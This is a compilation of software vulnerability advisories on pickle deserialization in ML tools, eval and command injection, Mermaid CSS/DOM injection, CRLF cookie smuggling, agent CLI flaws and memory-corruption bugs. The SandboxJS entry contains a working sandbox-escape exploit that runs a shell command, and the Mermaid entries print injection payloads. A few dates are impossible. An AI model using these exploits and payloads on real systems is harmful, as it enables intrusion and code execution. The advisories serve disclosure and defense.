Arbitrary code execution occurs in PyTorch Lightning 2.6.0 and earlier when loading malicious checkpoint files. The LightningModule.load_from_checkpoint() method deserializes untrusted Pickle data without security restrictions, allowing attackers to execute arbitrary Python code when victims open crafted .ckpt files. EPSS score of 0.06% (19th percentile) indicates low observed exploitation probability, and no public exploit code or CISA KEV listing exists at time of analysis. Attack requires local access and user interaction (opening a malicious checkpoint), limiting remote attack scenarios to social engineering or supply chain compromise.
Remote code execution in Adversarial Robustness Toolbox (ART) versions through 1.20.1 allows unauthenticated network attackers to execute arbitrary Python code via unsafe eval() usage in the Kubeflow robustness evaluation component. The vulnerability accepts unsanitized user input for LossFn and Optimizer parameters in PyTorch model evaluations, enabling complete system compromise. With CVSS 9.8 but only 0.06% EPSS score (18th percentile), this represents a severe theoretical risk that has not yet manifested in widespread exploitation. No public exploit code identified at time of analysis, and the vulnerability requires specific deployment of ART's Kubeflow integration component.
Command injection in Adversarial Robustness Toolbox (ART) up to version 1.20.1 enables remote code execution through unsafe eval() usage in Kubeflow pipeline components. The robustness_evaluation_fgsm_pytorch.py script directly evaluates user-controlled --clip_values and --input_shape arguments without sanitization, allowing Python code injection. With CVSS 9.8 (AV:N/AC:L/PR:N/UI:N) indicating network-exploitable unauthenticated access, this represents critical risk in automated ML pipeline environments where attackers can control pipeline configurations. EPSS score of 0.02% (5th percentile) suggests low observed exploitation activity, though the attack vector and ML tooling context create significant supply chain risk in CI/CD and research environments.
Remote code execution in Adversarial Robustness Toolbox (ART) through version 1.20.1 allows unauthenticated network attackers to execute arbitrary Python code by uploading malicious PyTorch model files to pipeline-accessible object storage locations. The vulnerability stems from unsafe use of torch.load() without the weights_only=True parameter in the Kubeflow component's model loading process, enabling Pickle deserialization of arbitrary objects. With CVSS 9.8 (AV:N/AC:L/PR:N/UI:N) but only 0.06% EPSS exploitation probability (19th percentile), this represents a critical-severity issue with low observed real-world targeting, likely due to the specialized nature of ML robustness evaluation deployments. No active exploitation confirmed (not in CISA KEV) and no public exploit code identified at time of analysis.
Remote code execution in PySyft Datasite/Server versions 0.9.5 and earlier allows unauthenticated attackers to execute arbitrary Python code on the server through the function submission mechanism. The vulnerability stems from insufficient validation and sandboxing of user-submitted Python functions decorated with @sy.syft_function(), which are executed using unsafe exec() and eval() calls after approval. With an EPSS score of 0.04% and no current KEV listing, this appears to be a high-severity vulnerability without confirmed active exploitation.
barebox version prior to 2026.04.0 contains multiple memory-safety vulnerabilities in the EFI PE loader in efi/loader/pe.c where integer overflow in virtual image size computation using 32-bit arithmetic on section VirtualAddress and size values allows undersized heap allocation, and PE section loading logic fails to validate that PointerToRawData plus copied size remains within the PE file buffer. An attacker can supply a malicious EFI PE binary via TFTP, USB, SD card, or network boot to trigger heap buffer overflow or out-of-bounds read from heap memory, potentially achieving code execution in bootloader context.
libcaca is a colour ASCII art library. In 0.99.beta20 and earlier, an integer overflow vulnerability in libcaca's canvas import functionality allows an attacker to cause a controlled heap out-of-bounds write (heap overflow) by supplying a crafted file in the "caca" format. Depending on the build configuration and memory allocator, this may lead to memory corruption or remote code execution. This is the same vulnerability as CVE-2021-3410 but the fix at that time was not fully correct. Commit fb77acff9ba6bb01d53940da34fb10f20b156a23 fixes this vulnerability.
Outline is a service that allows for collaborative documentation. From 0.84.0 to 1.6.1, the Outline comment section permits users to mention other users; however, the backend does not validate or sanitize the href attribute associated with these mentions. As a result, potentially dangerous protocols (e.g., javascript:) are not filtered, introducing a risk of client-side code execution. This vulnerability is fixed in 1.7.0.
An out-of-bounds write issue was addressed with improved bounds checking. This issue is fixed in iOS 18.7.9 and iPadOS 18.7.9, macOS Sequoia 15.7.7, macOS Sonoma 14.8.7, macOS Tahoe 26.5. An app may be able to execute arbitrary code with kernel privileges.
### Summary Sandbox-defined functions expose `Function.caller`, allowing sandboxed code to recover the internal `LispType.Call` runtime callback. That callback can then be invoked with attacker-controlled fake context and obj values to extract blocked host statics, recover the real host Function constructor, and execute arbitrary host JavaScript. ### Details In [executorUtils.ts](https://github.com/nyariv/SandboxJS/blob/1e6785658c94f5f2fb8e4a02cfcf1e7821b8be7f/src/executor/executorUtils.ts#L239-L282) `createFunction()` constructs normal host JS functions, and because these are ordinary host functions, sandbox code can observe: ```js function f(){ return f.caller } ``` That leaks the host-side callback that invoked the sandbox function. This leaked callback is the internal `LispType.Call` op, which is registered in [call.ts](https://github.com/nyariv/SandboxJS/blob/1e6785658c94f5f2fb8e4a02cfcf1e7821b8be7f/src/executor/ops/call.ts#L16-L17). The leaked callback accepts a **params** object from the attacker and uses its fields without any authentication checks. if you looked at those branches [call.ts:47](https://github.com/nyariv/SandboxJS/blob/1e6785658c94f5f2fb8e4a02cfcf1e7821b8be7f/src/executor/ops/call.ts#L47-L55), [call.ts:70](https://github.com/nyariv/SandboxJS/blob/1e6785658c94f5f2fb8e4a02cfcf1e7821b8be7f/src/executor/ops/call.ts#L70), [call.ts:149](https://github.com/nyariv/SandboxJS/blob/1e6785658c94f5f2fb8e4a02cfcf1e7821b8be7f/src/executor/ops/call.ts#L149-L153). This means the attacker controls `obj.context`, `obj.prop`, `obj.get`, `context.evals.get` and `a`. This can lead to direct invocation of an internal primitive with forged operands ### PoC ```js const sandb = require('@nyariv/sandboxjs').default; const sand = new sandb(); const payload = ` const callOp = (function fn() { return fn.caller; })(); function makeContext(capture = () => {}) { return { ctx: { options: 0 }, evals: { get: capture } }; } function leakStatic(obj, prop) { let leaked; callOp({ done() {}, a() {}, b: [], obj: { context: obj, prop, get() {} }, context: makeContext((fn) => (leaked = fn, () => 1)) }); return leaked; } function callDirect(fn, args) { let value; callOp({ done(_, result) { value = result; }, a() {}, b: args, obj: fn, context: makeContext() }); return value; } callDirect(leakStatic(Object, 'defineProperty'), [ leakStatic, 'call', callDirect(leakStatic(Object, 'getOwnPropertyDescriptor'), [ callDirect(leakStatic(Object, 'getPrototypeOf'), [() => 0]), 'constructor' ]) ]); let hostFn; callOp({ done(_, result) { hostFn = result; }, a: leakStatic, b: [], obj: { context: 'return process.getBuiltinModule("child_process").execSync("whoami").toString()', get() {} }, context: makeContext() }); return hostFn(); `; console.log(sand.compile(payload)().run()); ``` ### Impact _Sandbox escape leads to RCE_
### Impact Mermaid's default configuration allows injecting CSS that applies outside of the Mermaid diagram via the `fontFamily`, `themeCSS`, and `altFontFamily` configuration options. Live demo: [mermaid.live](https://mermaid.live/edit#pako:eNpNjktLxDAUhf9KvFBR6JS-60QQfODKlUvJ5k6TtsEmKTHFGUP-u-mI6Nmdy3fOPR56wwVQSBIvtXSUeAaD0e4ZlZxPDChhcLxFfwiEauOuLq_9Afv30ZpVczpaITS5kGox1qF2gfSeBwYhJAnThAyz-ewntI68vG5-0z3Z7e7IA9OQwmglB-rsKlJQwircLPgNZeAmocTPAi4GXGfHgOkQYwvqN2PUbzJuGSegA84f0a0LRyeeJI4W_xChubCPcbQD2pwbgHo4Aq2aKmvbqq3zoiu7pizqFE6RybN9VFfFY1HWXRVS-Dr_zLObrt7_V_gGGXZlGg) Example code: ``` %%{init: {"fontFamily": "x;a{b} :not(&){background:green !important} c{d}"}}%% flowchart LR A --> B ``` The injected CSS exploits stylis's `&` (scope reference) handling. `:not(&)` escapes the `#mermaid-xxx` automatic scoping, applying styles to all page elements. Global at-rules (`@font-face`, `@keyframes`, `@counter-style`) are also injectable as stylis hoists them to top level. This allows page defacement and DOM attribute exfiltration via CSS `:has()` selectors. ### Patches - [v11.15.0](https://github.com/mermaid-js/mermaid/releases/tag/mermaid%4011.15.0) (see [64769738d5b59211e1decb471ffbaca8afec51aa](https://github.com/mermaid-js/mermaid/commit/64769738d5b59211e1decb471ffbaca8afec51aa)) - [v10.9.6](https://github.com/mermaid-js/mermaid/releases/tag/v10.9.6) (see [a9d9f0d8eb790349121508688cd338253fd80d76](https://github.com/mermaid-js/mermaid/commit/a9d9f0d8eb790349121508688cd338253fd80d76)) ### Workarounds If you can't upgrade mermaid, you can set the [`secure`](https://mermaid.js.org/config/schema-docs/config.html#secure) config value in the mermaid config to avoid allowing diagrams to modify `fontFamily`, `themeCSS`, `altFontFamily`, and `themeVariables`. Setting [`"securityLevel": "sandbox"`](https://mermaid.js.org/config/schema-docs/config.html#securitylevel) will also prevent this. ### Credits Reported by @zsxsoft on behalf of @KeenSecurityLab
### Impact Under the default configuration, Mermaid state diagram's `classDef` allow DOM injection that escapes the SVG, although `<script>` tags are removed, preventing XSS. #### Proof-of-concept ``` stateDiagram-v2 classDef xss fill:red</style></svg><style>*{x:x;y:y;overflow:visible!important;contain:none!important;transform:none!important;filter:none!important;clip-path:none!important}</style><div style="x:x;y:y;color:red;font:5em/1 monospace;display:grid;place-items:center;z-index:2147483647;width:100vw;height:100vh;position:fixed;top:0;left:0;background:black">HACKED</div><svg><style>a:b [*] --> A:::xss ``` ### Patches - [v11.15.0](https://github.com/mermaid-js/mermaid/releases/tag/mermaid%4011.15.0) (see [37ff937f1da2e19f882fd1db01235db4d01f4056](https://github.com/mermaid-js/mermaid/commit/37ff937f1da2e19f882fd1db01235db4d01f4056)) - [v10.9.6](https://github.com/mermaid-js/mermaid/releases/tag/v10.9.6) (see [4e2d512bf5bf6f9de1a8f0a48da78dc4d09ac4f3](https://github.com/mermaid-js/mermaid/commit/4e2d512bf5bf6f9de1a8f0a48da78dc4d09ac4f3)) ### Workarounds If you can not update to a patched version, setting [`"securityLevel": "sandbox"`](https://mermaid.js.org/config/schema-docs/config.html#securitylevel) will prevent this, by rendering the mermaid diagram in a sandboxed `<iframe>`. ### Credits Thanks to @zsxsoft from @KeenSecurityLab for reporting this vulnerability.
### Details The state diagram and any other diagram type that routes user-controlled style strings through createCssStyles parser for Mermaid v11.14.0 and earlier captures `classDef` values with an unrestricted regex: ```jison // packages/mermaid/src/diagrams/state/parser/stateDiagram.jison:83 <CLASSDEFID>[^\n]* { this.popState(); return 'CLASSDEF_STYLEOPTS' } ``` The value passes unsanitized through `addStyleClass()` -> `createCssStyles()` -> `style.innerHTML` (mermaidAPI.ts:418). A `}` in the value closes the generated CSS selector, and everything after becomes a new CSS rule on the page. ### PoC ``` stateDiagram-v2 classDef x }*{ background-image: url("http://media.giphy.com/media/SggILpMXO7Xt6/giphy.gif")} ``` Live demo: <https://mermaid.live/edit#pako:eNpFjzFvgzAQhf-KdVNbEcBgMHhtlkqtOnSJKi8ONsYKBmRMlRTx3-skanvTfbp7996t0IxSAYPZC6_2Rmgn7O4rQ00v5nmvWnRG29OKjqI5aTcug9wZK7RiaHH9A4fO-4kliVXSiFibqbvEzWjvnHxo_fI6vR3e6cGXyX2qTcvhcYMItDMSmHeLisAqZ8UVYeUDQhx8p6ziwEIrhTtx4MNVM4nhcxztrywE0h2wVvRzoGWS_z_8rahBKvcckntgmN5OAFvhDIzUNCZZQXCR5nVaZkUEF2BVFpOcEkoxxhUuyRbB980yjStapKHqoKFlhvPtB7BFZEU> ### Patches This has been patched in: - [v11.15.0](https://github.com/mermaid-js/mermaid/releases/tag/mermaid%4011.15.0) (see [e9b0f34d8d82a6260077764ee45e1d7d90957a0f](https://github.com/mermaid-js/mermaid/commit/e9b0f34d8d82a6260077764ee45e1d7d90957a0f)) - [v10.9.6](https://github.com/mermaid-js/mermaid/releases/tag/v10.9.6) (see [8fead23c59166b7bab6a39eac81acebee2859102](https://github.com/mermaid-js/mermaid/commit/8fead23c59166b7bab6a39eac81acebee2859102)) ### Workarounds Setting [`"securityLevel": "sandbox"`](https://mermaid.js.org/config/schema-docs/config.html#securitylevel) will prevent this, by rendering the mermaid diagram in a sandboxed `<iframe>`. ### Impact Enables page defacement, user tracking via `url()` callbacks, and DOM attribute exfiltration via CSS `:has()` selectors.
Improper Neutralization of CRLF Sequences ('CRLF Injection') vulnerability in ninenines cowlib allows HTTP request splitting and cookie smuggling via unvalidated cookie name and value fields. cow_cookie:cookie/1 in cowlib builds a client-side Cookie: request header from a list of name-value pairs without validating either field. An attacker who controls the cookie names or values passed to this function can inject ;, ,, CR, LF, or TAB characters into the serialized header. This enables two classes of attack: cookie smuggling within a single header (e.g. injecting "; admin=1" to introduce a phantom cookie that the receiving server treats as authentic) and HTTP request header splitting (injecting CRLF to append arbitrary headers or smuggle a complete second request against a shared upstream proxy). The decoder side (parse_cookie_name/1, parse_cookie_value/1) and setcookie/3 already validate and reject these characters; the encoder alone is missing the check. This issue affects cowlib from 2.9.0.
Command injection in @wdio/browserstack-service allows arbitrary code execution when malicious git branch names are processed during test orchestration. Attackers can craft repository branch names containing shell metacharacters that execute when the BrowserStack service's getGitMetadataForAISelection() function unsafely passes branch names to Node.js execSync() calls. Exploitation requires configuring WebdriverIO to point at an attacker-controlled repository or cloning into a directory where tests run, making this primarily a supply chain and CI/CD pipeline risk. Publicly available exploit code exists with working proof-of-concept demonstrating file creation via injected commands. Vendor-released patch available in version 9.24.0 per GitHub advisory GHSA-5c46-x3qw-q7j7. CVSS 9.8 (Critical) reflects maximum impact, but real-world exploitation requires either social engineering developers to use malicious repos or compromising upstream dependencies - exploitation probability depends heavily on organizational code review and repository vetting practices.
Zen Browser's auto-update mechanism delivered unsigned code to all users due to deliberately removed MAR signature verification inherited from Firefox. The browser shipped with Mozilla's updater binary stripped of all cryptographic verification code and served update packages containing zero cryptographic signatures. Compromise of the update server or GitHub Actions pipeline allowed arbitrary code execution on all Zen installations without cryptographic chain-of-trust protection. Version 1.19.9b restores MAR signing with RSA-4096 keys and certificate verification in the updater binary.
Heap-based buffer overflow in dnsmasq's DHCPv6 implementation enables local attackers to execute arbitrary code with root privileges. Affects dnsmasq 2.93 (and potentially earlier 2.92 branch based on NixOS patching activity). CERT/CC issued VU#471747, and upstream published CVE-specific advisory at thekelleys.org.uk/dnsmasq/CVE/. NixOS patch activity (PR #519082, #519093) indicates real-world remediation effort. No CISA KEV listing or public POC identified at time of analysis, suggesting limited active exploitation despite high CVSS 8.4 score.
Arbitrary code execution in OpenClaw via CWD-based setup-api.js injection allows local attackers to run malicious JavaScript when users execute OpenClaw commands from attacker-controlled directories. Affects all OpenClaw versions before 2026.4.23. Vendor-released patch available in version 2026.4.23. Exploitation requires user interaction (running OpenClaw commands from a malicious repository) but no authentication. CVSS 7.8 reflects local attack vector with user interaction requirement, mitigating remote exploitation risk.
Remote code execution in OpenClaw npm package versions before 2026.4.20 allows local authenticated users to inject malicious code through MCP stdio server environment variables. Attackers craft workspace configurations containing dangerous environment variables (NODE_OPTIONS, LD_PRELOAD, BASH_ENV) that execute arbitrary code when operators start sessions using those MCP servers. Vendor-released patch available (version 2026.4.20). No public exploit code or active exploitation confirmed at time of analysis, though VulnCheck published detailed technical advisory. CVSS 7.3 reflects local attack vector requiring user interaction, limiting widespread exploitation risk despite high technical impact.
Remote code execution in GitHub Copilot CLI versions prior to 1.0.43 allows attackers to execute arbitrary commands via malicious bare git repositories embedded in project directories. When the CLI agent performs routine git operations, git's automatic bare repository discovery triggers execution of commands specified in config keys like core.fsmonitor. Attackers can deliver the malicious repository through pull requests, compromised dependencies, or pre-existing cloned repositories. No public exploit identified at time of analysis, though the attack technique leverages well-documented git behavior. The vendor-released patch (version 1.0.43) sets safe.bareRepository=explicit to block automatic bare repository discovery.
Remote code execution in OWASP BLT versions prior to 2.1.2 enables attackers to execute arbitrary code with repository write permissions via malicious GitHub pull requests. The vulnerability exploits a GitHub Actions workflow misconfiguration where pull_request_target triggers execute code directly from attacker-controlled forks without proper validation. EPSS data not available; no confirmed active exploitation (not in CISA KEV); publicly disclosed via GitHub Security Advisory GHSA-cgvj-qg2h-cqfh.
Unsafe Python pickle deserialization in pgAdmin 4 FileBackedSessionManager allows authenticated local users with session-directory write access to execute arbitrary code as the pgAdmin process. The vulnerability arises from deserializing session files before validating their HMAC signature, enabling payload injection through crafted pickle objects. Attackers require both valid authentication and filesystem write permission to the sessions directory-achievable through misconfiguration or chaining with a separate path-traversal vulnerability. EPSS exploitation probability and KEV status not provided; no public exploit code identified at time of analysis. PostgreSQL maintainers confirmed the flaw and patched it in version 9.15 by implementing pre-deserialization HMAC validation.
Remote code execution in angular-expressions versions ≤1.5.1 allows unauthenticated network attackers to escape the expression sandbox via malicious filter payloads and execute arbitrary system commands with no user interaction required. CVSS 9.3 (Critical) with confirmed public exploit code available. Vendor-released patch in version 1.5.2 addresses the sandbox escape. Affects applications using angular-expressions as a standalone module for evaluating user-supplied Angular.JS expressions.
Cross-Site WebSocket Hijacking (CSWSH) in Dozzle's /exec and /attach endpoints allows authenticated shell access bypass when --enable-shell is enabled. The vulnerability stems from WebSocket origin validation bypass (CheckOrigin returns true) combined with SameSite=Lax JWT cookies, enabling attackers on same-site origins (sibling subdomains or localhost services) to hijack victim WebSocket sessions and execute arbitrary commands in Docker containers. Affects all Dozzle deployments through version 10.5.1 with shell access enabled. No public exploit identified at time of analysis, but detailed proof-of-concept exists in the GitHub advisory demonstrating container shell access via Python script. CVSS score not assigned, but CWE-346 classification indicates origin validation failure.
Remote code execution in the Custom css-js-php WordPress plugin versions up to 2.0.7 allows unauthenticated attackers to execute arbitrary PHP code on the server through SQL injection chained with PHP eval(). The plugin fails to sanitize user input before passing it to SQL queries, with query results subsequently executed via eval(). EPSS score of 0.02% (5th percentile) suggests low observed exploitation activity, and no public exploit code has been identified at time of analysis, though the technical barrier is low (CVSS AC:L/PR:N).
Cross Site Scripting vulnerability in iotgateway v.3.0.1 allows a remote attacker to execute arbitrary code via the Log Record Function
CosyVoice thru commit 6e01309e01bc93bbeb83bdd996b1182a81aaf11e (2025-30-21) contains an insecure deserialization vulnerability (CWE-502) in its make_parquet_list.py data processing tool. The script loads PyTorch .pt files (utterance embeddings, speaker embeddings, speech tokens) using torch.load() without enabling the weights_only=True security parameter. This allows the deserialization of arbitrary Python objects via the pickle module. An attacker can exploit this by providing malicious .pt files within a data directory. When a victim processes this directory using the tool, arbitrary code is executed on the victim's system.
SQL Injection in MuuCMF T6 v1.9.4.20260115 allows an unauthenticated attacker to compromise the entire database, achieve unauthorized administrative access, and potentially gain remote code execution by writing malicious files to the server's file system via the keyword parameter in the /index/controller/Search.php endpoint.
The flash-attention training framework thru commit e724e2588cbe754beb97cf7c011b5e7e34119e62 (2025-13-04) contains an insecure deserialization vulnerability (CWE-502) in its checkpoint loading mechanism. The load_checkpoint() function in checkpoint.py and the checkpoint loading code in eval.py use torch.load() without enabling the security-restrictive weights_only=True parameter. This allows the deserialization of arbitrary Python objects via the pickle module. An attacker can exploit this by providing a maliciously crafted checkpoint file. When a victim loads this checkpoint during model warmstarting or evaluation, arbitrary code is executed on the victim's system.
Remote code execution in QuickJS-NG 0.12.1 allows unauthenticated network attackers to execute arbitrary code through the js_mapped_arguments_mark function. The vulnerability enables attackers to achieve code injection with low confidentiality, integrity, and availability impact via network-accessible JavaScript engine exploitation. EPSS score of 0.02% (5th percentile) indicates very low predicted exploitation probability, and no active exploitation has been publicly reported at time of analysis.
GPT-Pilot thru commit 0819827ce20346ef5f25b3fe29293cb448840565 (2025-09-03) contains a command injection vulnerability (CWE-78) in the Executor.run() method. During project execution, when the system prompts the user to confirm or modify a command to be run, it accepts free-text input without proper validation. The user-supplied input is directly passed to asyncio.create_subprocess_shell() for execution. This allows an attacker to replace the intended command with arbitrary shell commands, leading to remote code execution with the privileges of the GPT-Pilot process.
CosyVoice thru commit 6e01309e01bc93bbeb83bdd996b1182a81aaf11e (2025-30-21) contains an insecure deserialization vulnerability (CWE-502) in its model loading component. The framework uses torch.load() to load model weight files (e.g., llm.pt, flow.pt, hift.pt) without enabling the security-restrictive weights_only=True parameter. This allows the deserialization of arbitrary Python objects via the pickle module. An attacker can exploit this by providing a malicious model directory containing specially crafted model files. When a victim starts the CosyVoice Web UI pointing to this directory, arbitrary code is executed on the victim's system during the model loading process.